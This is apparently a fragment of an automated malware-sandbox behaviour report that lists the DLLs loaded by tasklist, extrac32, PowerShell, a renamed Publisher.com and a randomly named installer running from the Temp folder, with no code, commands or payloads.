Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\243714\Publisher.com	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DGUQE.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\9G18T8ZC0J1TEEA21J35VVJ53B.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-N42CA.tmp\9G18T8ZC0J1TEEA21J35VVJ53B.tmp	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\find.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\find.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
